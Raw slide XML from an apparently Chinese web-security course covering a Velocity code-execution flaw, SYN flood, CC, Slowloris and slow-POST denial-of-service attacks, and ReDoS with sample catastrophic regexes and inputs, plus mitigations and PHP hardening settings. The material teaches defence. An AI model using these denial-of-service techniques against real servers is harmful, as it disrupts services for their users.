              <a:t>8.3 Velocity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地代码执行漏洞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详细说明：在使用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框架的时候，开发往往会配置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中，请求文件扩展名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时，就解析对应的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模板，这时就需要一个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给出了自己的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，供大家使用，一共提供了两个，其中最为推荐的，就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>VelocityLayoutServlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，因为官方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>showcase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中就使用了这个。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这个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配合几个技巧，可以做到执行任意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struts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>升级到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2.3.4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YII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>升级 到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1.1.7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Velocity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不使用官方自带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、应用层拒绝服务攻击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9.1    DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>简介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     DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>又称为分布式拒绝服务，全称是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Distributed Denial of Service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DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本身利用合理的请求造成资源过载，导致服务不可用。比如一个停车场总共有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个车位，当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个车位都停满车后，再有车想要停进来，就必须等已有的车先出去才行。如果已有的车一直不出去，那么停车场的入口就会排起长队，停车场的负荷过载，不能正常工作了，这种情况就是“拒绝服务”。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9.2     SYN Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击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    SYN-Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是目前最流行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击手段，早先的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的手段在向分布式这一阶段发展的时候也经历了浪里淘沙的过程。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN-Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的攻击效果最好，应该是众黑客不约而同选择它的原因吧。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" y="188640"/>
            <a:ext cx="9036050" cy="5937523"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>那么我们一起来看看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN-Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的详细情况。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原理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三次握手    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用了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协议的固有漏洞。面向连接的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三次握手是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存在的基础。</a:t>
            </a:r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42493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" y="116632"/>
            <a:ext cx="9036050" cy="6009531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如上图，在第一步中，客户端向服务端提出连接请求。这时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TCP SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标志置位。客户端告诉服务端序列号区域合法，需要检查。客户端在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报头的序列号区中插入自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。服务端收到该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分段后，在第二步以自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标志置位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，同时确认收到客户端的第一个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(ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标志置位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。在第三步中，客户端确认收到服务端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ISN(ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标志置位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。到此为止建立完整的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连接，开始全双工模式的数据传输过程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80320"/>
            <a:ext cx="842493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、跨站脚本攻击（XSS）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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>1.1 定义</a:t>
            </a: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ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（Cross Site Scripting, XSS）恶意攻击者利用Web应用的漏洞，上传包含恶意脚本（通常是JavaScript）的代码，而当受害者查看包含这些脚本的内容时，会触发并执行，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>常见后果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>伪造请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>获取用户账户信息、隐私信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>监控、统计用户浏览行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>植入广告、木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>tc.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928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" y="0"/>
            <a:ext cx="9036050" cy="6381327"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>假设一个用户向服务器发送了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>报文后突然死机或掉线，那么服务器在发出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN+ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应答报文后是无法收到客户端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN+ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>给客户端）并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN Timeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，一般来说这个时间是分钟的数量级（大约为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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分钟）；一个用户出现异常导致服务器的一个线程等待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分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源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数以万计的半连接，即使是简单的保存并遍历也会消耗非常多的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时间和内存，何况还要不断对这个列表中的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SYN+ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的重试。实际上如果服务器的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栈不够强大，最后的结果往往是堆栈溢出崩溃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即使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的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连接请求而无暇理睬客户的正常请求（毕竟客户端的正常请求比率非常之小），此时从正常客户的角度看来，服务器失去响应，这种情况我们称做：服务器端受到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>洪水攻击）。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应用层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>hallenge Collapasar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/>
              <a:t>胖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>男孩大战绿盟黑洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>原理：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>光明正大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>耍流氓</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>小小爬虫爬死你</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>银角大王压悟空</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>anti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>原则：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1.memcache 2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>负载均衡 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对抗手段限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>请求频率</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ip+cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>限制访问频率 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>anti:ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代理服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>人机识别：验证码 ，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>javascript , flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>timeout,keepalivetimeout </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>mod_qos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>较少的访问做限制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8350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275" y="188913"/>
            <a:ext cx="7416800" cy="14374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资源耗尽攻击：本质是针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MaxClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>限制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过构造畸形</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>请求，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包头吃掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CLRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>认为请求没有结束则继续等待。然后客户端再发送任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>保持住链接即可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Content-length:42\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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\r\n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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mtClean="0"/>
              <a:t>HTTP POST DOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>content-lenth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>写大，然后以极低的速度发包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anti:web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应用防火墙，或定制的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全模块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3149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" y="188640"/>
            <a:ext cx="9036050" cy="593752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9.3    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ReDOS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正则表达式攻击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详细说明：当正则表达式写得不好时，就有可能被恶意输入利用，消耗大量资源，从而造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOS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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>a+)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>当输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>aaaax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条可能的路径，当输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>aaaaaaaaaaaaaaaax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>65536</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>条，每增加一个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都会翻倍。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>类似的还有：</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>([a-zA-Z]+)*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pl-PL" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(a|aa)+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pl-PL" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(a|a?)+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pl-PL" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(.*a){x} for x &gt; 10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          对付</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是一个系统工程，想仅仅依靠某种系统或产品防住</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是不现实的，可以肯定的是，完全杜绝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目前是不可能的，但通过适当的措施抵御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DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击是可以做到。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措施：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>采用高性能的网络设备</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尽量避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>NAT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 smtClean="0"/>
              <a:t>充足的网络带宽保证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>升级主机服务器硬件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>把网站做成静态页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>增强操作系统的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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保证系统健壮性和可线性扩展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及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配置安全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10.1  PHP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10.1.1  PHP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10.1.2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户输入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上传 预处理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10.1.3  DB SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>预处理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及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配置安全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10.1.1  PHP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err="1" smtClean="0"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r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dirty="0" err="1" smtClean="0"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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dirty="0" err="1" smtClean="0"/>
              <a:t>display_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = Off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开发环境可置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
